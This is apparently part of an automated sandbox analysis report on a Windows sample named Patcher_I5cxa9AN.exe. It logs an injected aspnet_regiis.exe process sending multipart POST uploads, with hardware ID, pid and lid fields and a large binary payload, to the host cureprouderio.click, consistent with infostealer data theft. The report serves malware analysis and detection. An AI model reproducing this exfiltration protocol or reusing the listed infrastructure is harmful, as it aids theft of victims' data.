2025-01-05 19:41:58 UTC	8791	OUT	Data Raw: 2d 2d 45 50 50 59 38 35 38 33 4e 52 4d 4c 4b 31 59 39 50 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 36 39 44 36 39 33 39 42 45 43 33 37 31 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 45 50 50 59 38 35 38 33 4e 52 4d 4c 4b 31 59 39 50 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 50 50 59 38 35 38 33 4e 52 4d 4c 4b 31 59 39 50 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 67 79 66 73 73 Data Ascii: --EPPY8583NRMLK1Y9P1Content-Disposition: form-data; name="hwid"6569D6939BEC37108EEA336AD54C4C07--EPPY8583NRMLK1Y9P1Content-Disposition: form-data; name="pid"2--EPPY8583NRMLK1Y9P1Content-Disposition: form-data; name="lid"LPnhqo--gyfss
2025-01-05 19:41:58 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 19:41:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=grui2ti7hvmq7ts7map79s060e; expires=Thu, 01 May 2025 13:28:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBCZEfQmpwR1sGLaTcmgtheYn56pfWCl56PvZijSkLaZkX6APF%2Be3fcxONBuNvLcsnwFl9iL5MmPeZpJzjruotXpO9aci%2FVu41AKrHz%2BfjATcUwzIz7wSi%2B1RUwQ0s9J2U7fecwH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5f2e848650f80-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1628&min_rtt=1622&rtt_var=622&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2849&recv_bytes=9733&delivery_rate=1741204&cwnd=207&unsent_bytes=0&cid=82634ab13e65e4a4&ts=498&x=0"
2025-01-05 19:41:58 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 19:41:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	172.67.132.7	443	7332	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:41:59 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JFRI0XTWAP9VNET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20426 Host: cureprouderio.click
2025-01-05 19:41:59 UTC	15331	OUT	Data Raw: 2d 2d 4a 46 52 49 30 58 54 57 41 50 39 56 4e 45 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 36 39 44 36 39 33 39 42 45 43 33 37 31 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 4a 46 52 49 30 58 54 57 41 50 39 56 4e 45 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4a 46 52 49 30 58 54 57 41 50 39 56 4e 45 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 67 79 66 73 73 68 62 79 6f 74 73 6a 0d 0a Data Ascii: --JFRI0XTWAP9VNETContent-Disposition: form-data; name="hwid"6569D6939BEC37108EEA336AD54C4C07--JFRI0XTWAP9VNETContent-Disposition: form-data; name="pid"3--JFRI0XTWAP9VNETContent-Disposition: form-data; name="lid"LPnhqo--gyfsshbyotsj
2025-01-05 19:41:59 UTC	5095	OUT	Data Raw: 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 Data Ascii: M?lrQMn 64F6(X&7~`aO
2025-01-05 19:42:00 UTC	1133	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 19:42:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=floja3u4ns9e6ht9jpb0mbriek; expires=Thu, 01 May 2025 13:28:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XTK%2B1G%2Bglo06pBprz828aLNY3ThK2CFwAAcVZfS%2Fa2nGwLSgs4JaLT%2FVpuAXWdJDv3jrDygWoXke0aI1PXRBm1T8LXdtNJEp3p0vZu5%2B3L7ut7Vh4YCpTaO8ipW0KYGY7kdtMxrw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5f2efe8b70ca0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1667&rtt_var=648&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2850&recv_bytes=21388&delivery_rate=1660034&cwnd=239&unsent_bytes=0&cid=27685dc60379d5ae&ts=639&x=0"
2025-01-05 19:42:00 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 19:42:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	172.67.132.7	443	7332	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:42:00 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=7KD821I4EZLFX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1244 Host: cureprouderio.click
2025-01-05 19:42:00 UTC	1244	OUT	Data Raw: 2d 2d 37 4b 44 38 32 31 49 34 45 5a 4c 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 36 39 44 36 39 33 39 42 45 43 33 37 31 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 37 4b 44 38 32 31 49 34 45 5a 4c 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 4b 44 38 32 31 49 34 45 5a 4c 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 67 79 66 73 73 68 62 79 6f 74 73 6a 0d 0a 2d 2d 37 4b 44 38 Data Ascii: --7KD821I4EZLFXContent-Disposition: form-data; name="hwid"6569D6939BEC37108EEA336AD54C4C07--7KD821I4EZLFXContent-Disposition: form-data; name="pid"1--7KD821I4EZLFXContent-Disposition: form-data; name="lid"LPnhqo--gyfsshbyotsj--7KD8
2025-01-05 19:42:01 UTC	1132	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 19:42:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eg4df1nih40iur87a509ekopjk; expires=Thu, 01 May 2025 13:28:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V4yUJRw%2FaxQP%2BWRe1x%2BaFm4GpaqfVqJPvLM6TZWMivqiX6s7Q%2Fbu6qx3ep%2FmAmXSuBYcbGg8SsiDnpb79GpoT8qe2CO5v%2BszeceFoGJVeguTf8m6FPDCjH9lcJ3I97Ep8wcuelGC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5f2f85a63c332-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1624&rtt_var=624&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=2159&delivery_rate=1732937&cwnd=180&unsent_bytes=0&cid=2ab37a75a725579a&ts=474&x=0"
2025-01-05 19:42:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 19:42:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	172.67.132.7	443	7332	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 19:42:02 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CHY259J8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 569954 Host: cureprouderio.click
2025-01-05 19:42:02 UTC	15331	OUT	Data Raw: 2d 2d 43 48 59 32 35 39 4a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 36 39 44 36 39 33 39 42 45 43 33 37 31 30 38 45 45 41 33 33 36 41 44 35 34 43 34 43 30 37 0d 0a 2d 2d 43 48 59 32 35 39 4a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 48 59 32 35 39 4a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 67 79 66 73 73 68 62 79 6f 74 73 6a 0d 0a 2d 2d 43 48 59 32 35 39 4a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --CHY259J8Content-Disposition: form-data; name="hwid"6569D6939BEC37108EEA336AD54C4C07--CHY259J8Content-Disposition: form-data; name="pid"1--CHY259J8Content-Disposition: form-data; name="lid"LPnhqo--gyfsshbyotsj--CHY259J8Content-D
2025-01-05 19:42:02 UTC	15331	OUT	Data Raw: 30 95 58 29 cd 58 02 48 7a 12 16 4c 79 1c f6 0a b0 cd 14 c0 ef c2 6b 7d 87 71 48 46 6f 2b bc c6 18 3a 2f 49 c3 ef 26 bb 88 80 33 ea 58 18 c7 c5 ae 59 a3 43 15 b7 af ee e7 ba 6d 07 a9 41 8e ff 6f 95 92 e6 03 74 fb 5d c1 1d 34 a8 27 93 7b 82 80 d7 16 0e 16 a0 29 38 a7 85 85 97 98 b1 7b d2 4a 05 20 de 9f 0b 46 a9 c7 18 bc 05 43 db 36 4b 88 71 48 aa 57 18 5c 4a 4c 73 70 c3 81 06 79 5e 80 31 3a 66 7b 86 43 09 24 a7 02 53 b7 f3 8b 34 69 7e 9b 9f 93 c3 1e 7e 31 62 8a 76 4a 79 39 72 a1 e8 11 e3 f8 57 8b 53 2a bc 69 ad 38 6a 85 a9 ac c6 10 2c d3 53 84 d8 00 de 8f a2 62 4c c1 05 0c 8b 92 b2 d5 e0 ef 22 cf a9 75 24 72 49 2b f2 55 fc 63 c6 e3 ab 76 12 54 32 23 1d 0b 4b 2c 6b ce bc 5b 02 7e 7b 68 da e8 40 41 f0 a3 1f cd de 3c 32 12 a8 12 bf 76 f3 68 1e 8a 5a 1f 1d f1 Data Ascii: 0X)XHzLyk}qHFo+:/I&3XYCmAot]4'{)8{J FC6KqHW\JLspy^1:f{C$S4i~~1bvJy9rWS*i8j,SbL"u$rI+UcvT2#K,k[~{h@A<2vhZ
2025-01-05 19:42:02 UTC	15331	OUT	Data Raw: 65 24 8d 7d 1c 69 63 e6 f4 6a 3a a3 fd d7 1a 34 87 b0 bc 51 50 0a fb a2 de 2a b7 49 c0 91 9b 0a 63 f9 13 11 2d 14 89 60 2f 09 da a9 07 b8 8e 17 08 2a 52 66 18 ec 95 8a 2c 31 5d cb 7c 34 6c 2a 46 ab 8c 4f 3f ab 5c 97 0c 11 20 ee e9 7e 97 df 44 37 99 82 85 62 b4 54 1f e2 e5 0a 5f 68 cc 7e 28 14 19 db 3d 69 08 7c 90 e8 37 75 4a 11 88 09 2a b9 a6 14 a3 83 ee 19 0c 17 9a fd 62 34 3d d8 b1 4e 2f b1 d8 df 79 9e 29 89 0e 17 e4 ed ab a7 ff a5 ea fa 3d 8e c2 30 28 e3 cc cd 19 f9 ad be 39 66 c9 19 90 46 f8 9d af c8 cd 75 33 88 70 ad 1d a1 5a df 1f 20 ef e9 ba 1e 41 b9 72 86 eb f2 06 0f 8d be 9a 9f fa 2e 76 b9 f2 af a0 9f 2d 1a 9b f1 de 2e 90 8f 26 9c 79 82 8c b9 83 b9 fb 60 f1 52 4c 56 9e da 9d 78 36 a9 f5 20 f9 02 a3 61 e1 04 bb 51 37 4f 22 8c 99 5a 53 f6 a1 34 14 Data Ascii: e$}icj:4QPIc-`/Rf,1]\|4lFO?\ ~D7bT_h~(=i\|7uJb4=N/y)=0(9fFu3pZ Ar.v-.&y`RLVx6 aQ7O"ZS4
2025-01-05 19:42:02 UTC	15331	OUT	Data Raw: bb 77 80 ea 0b 5d 4e bf b7 0c 29 fa ea b7 27 25 b6 4b 5f ed a9 17 97 9e 5d 0d 03 b6 31 a8 39 b6 59 6b 5e 09 c0 50 7f df fd 78 e4 15 d3 a5 2f 38 03 75 a0 65 be 79 df a3 75 c2 d5 70 a5 d4 14 6f eb 60 94 ff ee da d4 5f 04 dd 14 41 f1 17 b1 03 be e0 8c cd 7f 45 93 a3 d7 3b ea 8c 72 96 26 9a ad b6 97 8a 3e 3a f1 92 a3 e5 77 97 d4 7c e2 9a ed 9c 0f bf 5e 78 ef bf 97 21 3b 2c 78 87 e2 f6 01 dd 8b fc fc 90 23 fd 80 f0 5f 2d 25 75 73 93 73 91 ea 1a ba 64 f7 f1 46 6f d4 92 c8 4d b4 c7 3d d7 24 a1 a4 06 3d 41 33 17 30 d6 a6 c6 54 ea f6 16 04 d7 96 60 e7 51 ea e6 71 19 3a 61 70 cb ef ce c9 cf dd 38 66 4f fb d1 92 b4 85 47 94 bd dd ed 1f e7 52 2b 7f 70 0c e2 2c 28 b2 57 9b ef f2 14 2f 9e a3 f9 95 b5 f6 93 3f ed 9e e1 e9 b7 fc a9 7a d0 ed d5 07 5b 35 8a 45 69 f3 58 b1 Data Ascii: w]N)'%K_]19Yk^Px/8ueyupo`_AE;r&>:w\|^x!;,x#_-%ussdFoM=$=A30T`Qq:ap8fOGR+p,(W/?z[5EiX
2025-01-05 19:42:02 UTC	15331	OUT	Data Raw: e2 e0 e6 41 1d e1 2e 5f ad d3 1c 1f 29 a3 f1 36 07 af 72 72 ce 82 d7 d0 c8 0b d5 a5 da e4 aa b2 24 74 ec 01 d5 11 0b 8e 4d f0 7e 67 17 79 b1 dd 3b 7b 5a 99 6e 0f b9 cd 9a 95 79 4f fe 1e 2b c9 80 57 05 6e 56 67 b8 e6 42 bc 65 44 2f c2 60 8e 0b fe 30 63 70 73 2f 42 08 18 4d e4 42 75 44 a0 f7 fa 0c 1f 71 70 5c cd 66 07 f2 3c 94 de 10 f5 bf 32 69 8b 0c 0a b8 ed 35 e9 54 74 1f 09 3e dc cb 6c e2 01 43 14 c7 51 6b 55 17 8c f0 ce bb f7 9f 0e bf d7 36 f5 d7 92 74 b8 7f 44 d2 e6 9e ca 7b 65 73 52 ba 1f fa ef 03 5a d3 c2 c9 84 15 88 e1 9f 48 e5 fb ff bf 92 1b 92 a0 74 8c 07 ce 03 8b 7f 06 2e c9 2c be 11 62 54 95 53 52 5a 90 c5 f0 e7 c5 92 47 45 3c 1c 84 f3 54 fb 27 ce 8e 70 c2 77 89 b2 ac 04 41 c4 9f ed e9 40 45 fb 19 92 58 6b 90 1a b8 15 a5 4d 3d f4 71 df 43 d6 83 Data Ascii: A._)6rr$tM~gy;{ZnyO+WnVgBeD/`0cps/BMBuDqp\f<2i5Tt>lCQkU6tD{esRZHt.,bTSRZGE<T'pwA@EXkM=qC
2025-01-05 19:42:02 UTC	15331	OUT	Data Raw: 4a 93 1b df cb 89 b3 9d 93 4b 6b 43 36 6e 15 f3 eb cc 22 e4 9c ea 24 84 9b ca 91 15 16 8d 9f 97 6b b0 d5 f2 85 2e f6 84 02 b9 67 51 85 a4 46 03 03 5f 81 1f 07 5b 02 a9 ea ca ad de da b5 09 50 bc f7 b6 cf b3 34 2d 64 60 c1 f6 ab 1d b5 22 d6 32 8c 00 c4 ae 5a 67 94 72 b8 3e c7 b6 8b 63 4a bf 10 06 04 dd 18 bb c7 d7 73 ff c8 dd ad 49 a7 7a c5 ee 22 67 8f b6 64 a1 12 95 68 43 31 fb f1 be cb 1f 8d 6c be e9 7b 16 08 1a 6a 34 85 6d f1 85 9d 6e e3 2b ce 37 9c 75 8c ed ad d8 7e f0 23 c8 f0 87 d0 39 67 d9 5f 75 89 cf a0 df 25 d8 dc ca 44 0c 01 3c 18 2a a0 b7 b6 0d ca db 72 7f b8 42 c2 d9 88 de 41 dc fa 2d 7a c1 51 9d c3 5b fa b8 43 1c 7f d4 c4 d6 51 7a 91 99 01 c9 b0 4a 92 11 bd 4f 4d 7d 56 4f 1e 13 02 fb fc a8 0e e9 9f 62 9e 07 f9 57 31 72 84 98 e3 f7 79 c0 c2 4e Data Ascii: JKkC6n"$k.gQF_[P4-d`"2Zgr>cJsIz"gdhC1l{j4mn+7u~#9g_u%D<*rBA-zQ[CQzJOM}VObW1ryN
2025-01-05 19:42:02 UTC	15331	OUT	Data Raw: 96 b7 59 d6 2e 64 7a fd 67 39 45 4e 94 bc ab eb 39 ab e4 ff 6b ab f8 89 93 45 c0 d7 3b 87 f3 e2 aa 3c de ec 6b 0b 8c d3 ed fb 86 c4 bb 73 df aa b2 86 25 9a 60 17 4e 95 20 23 05 41 1e 3a b0 ba 34 23 29 8d 13 84 dc 40 9d db 4c 41 ea 6e 36 6c a2 dc e1 56 d5 43 d1 1f 17 01 61 d5 3b 08 dc c2 c9 cc 66 4e 70 a0 4a fe b7 65 af 6c 7c f4 92 01 d7 ee 2c 0f c9 7a 99 fa d7 bf 3e 7e 84 fc b1 33 3e 1b 48 10 ef bd 81 5b c4 21 cb 6f 39 a6 b9 cf 95 c4 57 e3 15 ad 68 49 8c f5 9f 99 f8 c8 27 9b a1 29 88 e4 db 2c cc e6 b8 2d 69 28 a1 40 1b 09 37 1f b0 22 4d d0 59 b9 b3 5a fa 6d 3e 9a f5 33 4a f4 26 1a e0 36 57 7f a6 b1 7c 86 10 f4 6b a3 4b 8f 73 ee 05 32 d9 01 ce d5 3f ae 45 39 f4 82 c5 1a 21 70 75 63 b4 e4 63 8d f4 68 a5 52 df 66 25 4c 7d 0c 40 74 29 fd 1d 07 f0 28 fb 28 9d Data Ascii: Y.dzg9EN9kE;<ks%`N #A:4#)@LAn6lVCa;fNpJel\|,z>~3>H[!o9WhI'),-i(@7"MYZm>3J&6W\|kKs2?E9!pucchRf%L}@t)((
2025-01-05 19:42:02 UTC	15331	OUT	Data Raw: d4 9f 44 42 88 1c 62 de 89 7a 20 60 0e 5e 37 9c bf 16 0a 13 9e 87 e8 f3 27 2e 0e 55 38 8c e6 a5 13 44 34 19 0a e9 8a af c9 09 9e a6 b0 69 3d 5c 26 d5 45 e5 be 9b b6 b9 18 86 81 09 64 67 be 5f ed ff 6d 4f 6b d1 cb fc 91 b0 09 78 0e cc 3d 47 c1 b2 f3 67 c6 5f 60 61 3e 1c ef a2 34 b6 73 7c 62 ce 95 6d 3f 10 69 40 d4 46 99 89 f5 15 dd b0 af 75 51 4a 9f 1b 4f 31 bb a0 78 49 29 c3 60 4e bd cd 35 d6 be 86 28 1f aa 77 49 30 9e cc 0f 78 05 d6 63 ab 8e ba d6 77 9a 35 8d ef 0f 71 94 0a 40 62 56 f9 8a 7a e9 0f 3c fd 49 d8 eb fb 16 bd a1 64 64 77 6a 5c 4b 0d ef 89 68 a0 d9 7c 1a fc 56 be aa 5f e2 c9 79 51 f6 e0 f8 b0 44 bf d3 a6 f3 bf 88 27 94 c2 fd 53 f5 57 05 48 81 1e 31 8c 61 a3 fc 9e 92 80 6b 5e 4b 9b 5f 12 f1 a4 5a 53 b9 f4 9f d7 69 67 f5 86 9a 69 73 88 a5 02 98 Data Ascii: DBbz `^7'.U8D4i=\&Edg_mOkx=Gg_`a>4s\|bm?i@FuQJO1xI)`N5(wI0xcw5q@bVz<Iddwj\Kh\|V_yQD'SWH1ak^K_ZSigis
2025-01-05 19:42:02 UTC	15331	OUT	Data Raw: e8 83 99 08 2d 09 62 e6 cb 82 aa cb fb 01 fc 2f 2f 88 36 98 74 af cc 59 7b 99 d8 42 d6 c6 72 1d 50 df 35 79 04 b6 9b 39 cc 48 81 ab bb 4d e5 21 52 3c 1c 84 2c 13 ce b0 74 1f 4d 86 5f 93 79 31 76 41 12 4b 9c e2 eb f8 95 e0 b7 20 dc 4a 40 44 ba f9 79 cc 3f 50 e1 ce ed a9 50 ef 74 e8 58 82 2c b3 71 9d 26 82 df 25 0b bf 03 28 b7 a1 a4 d8 ad 83 cf 43 88 f8 1b 8c 8b c9 b6 b3 dd 45 c3 7a 6c 19 61 21 37 ee c1 6b a3 05 c2 51 2a 9d 80 3b 31 17 7e 94 00 6b 19 fe 9a 63 72 5e e9 b4 35 44 4b 88 0a 41 ca 1b 81 3a 54 61 82 08 9d b0 ef 52 fd 03 88 1f e2 e3 17 94 f8 56 73 e0 51 ac fc d3 4f e0 40 ef d7 a6 7c 94 59 43 b0 04 e7 0d 48 7f 12 ac 8a a0 05 bb c6 34 be 78 32 a8 ee 90 df 1e c0 37 9b 94 47 e6 e7 9b dd a2 47 85 09 0a 33 b5 97 85 f9 be 55 7f 96 67 68 f3 d3 a9 6c 97 2a Data Ascii: -b//6tY{BrP5y9HM!R<,tM_y1vAK J@Dy?PPtX,q&%(CEzla!7kQ;1~kcr^5DKA:TaRVsQO@\|YCH4x27GG3Ughl
2025-01-05 19:42:02 UTC	15331	OUT	Data Raw: 0b e0 1c 35 5b f1 42 6c 00 f6 d1 16 e9 fe ff 00 65 f6 b9 d6 a3 42 63 90 6e ce d8 d0 db ff 74 fb 38 6c 7c 17 d4 2d c8 e6 9f ab be 7f f8 96 04 61 bb 51 00 b7 17 22 f3 43 19 7b a2 87 62 f3 8d ec 50 30 1c 66 bb 7b 9b a5 3f 67 dd fa 19 5c 1f c2 cb 9d c2 b2 0b b2 8f ee 97 66 de 6a 50 b3 39 8d ac 6d 8c fb fe d2 37 c7 4b 01 ec c1 73 02 22 ab 16 63 a4 4e 3a f9 72 3f 34 bb 3a c8 d2 8a 26 2c f8 c9 e2 9c c7 5f cd 6f 03 fc 04 e2 af 11 62 10 2e 18 b7 f5 eb d9 a5 d1 24 11 8a 2f 64 ee 98 9f 81 90 79 58 2f ba 43 b0 29 4b eb 10 38 6c 9d 5e 5b 63 b4 1a 98 d6 84 36 2d c5 f0 d3 1b 79 28 e6 26 c5 dc f3 2c 6b 3d e9 d3 f5 34 5e 30 b9 81 9e b1 03 4d bf 84 35 16 28 af 93 6a 65 d3 15 eb 03 65 45 c6 74 de 28 27 86 7b 4b 31 9b 55 e6 bd 5d 11 df f4 5b 95 1e 8a e7 3c b8 c6 6f 01 d8 b9 Data Ascii: 5[BleBcnt8l\|-aQ"C{bP0f{?g\fjP9m7Ks"cN:r?4:&,_ob.$/dyX/C)K8l^[c6-y(&,k=4^0M5(jeeEt('{K1U][<o
2025-01-05 19:42:05 UTC	1143	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 19:42:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j37pr2unmrmhioeu5ma9gh2pt8; expires=Thu, 01 May 2025 13:28:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8JiLLabQWxzz8z%2FKXujta%2FE8nsTwVoD47u%2F2Uf4UK5IpbizSn%2BfXqYuxwR%2FIWz5zBzevgVe%2F1%2BNoY3MU7MpVl25hi4P7Tc8KZXaIilUYa0lP6AyZhmCXPzSBhbFkndfQdf4HOmQ%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5f302ae2e4364-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1722&rtt_var=673&sent=196&recv=587&lost=0&retrans=0&sent_bytes=2851&recv_bytes=572494&delivery_rate=1592148&cwnd=206&unsent_bytes=0&cid=32b920bc2b7573a8&ts=3227&x=0"

Target ID:	0
Start time:	14:41:52
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\Patcher_I5cxa9AN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Patcher_I5cxa9AN.exe"
Imagebase:	0x310000
File size:	493'568 bytes
MD5 hash:	F23B6BCE35ED7E7FD538A426DEFD13B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:41:52
Start date:	05/01/2025
